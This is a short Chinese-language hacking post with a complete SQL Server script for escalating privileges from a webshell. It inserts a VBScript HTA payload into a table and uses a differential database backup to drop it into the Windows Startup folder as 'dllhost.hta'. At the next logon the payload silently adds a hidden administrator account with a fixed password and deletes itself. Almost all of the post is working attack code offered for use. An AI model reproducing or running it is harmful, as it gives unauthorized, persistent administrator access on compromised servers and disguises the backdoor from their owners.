Webshell提权之启动项备份hta文件

连接sql后全部代码如下：

create table [bin_cmd]([cmd] [image]);

declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;

insert into [bin_cmd](cmd)values('<scrIpt language=VBScript>window.moveTo 8888,8888:Set s=CreateObject("Wscript.Shell"):s.Run "cmd.exe /c net user ASPMET 123_asda!@ /add",0:s.Run "cmd.exe /c net localgroup administrators ASPMET /add & del dllhost.hta",0:window.resizeTo 0,0:window.close</script>');

declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='C:\Documents and Settings\All Users\「开始」菜单\程序\启动\dllhost.hta' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;

drop table [bin_cmd];

运行后会删除自身，并且添加一个用户名ASPMET，密码为123_asda!@的管理员组账户，比vbs那个好些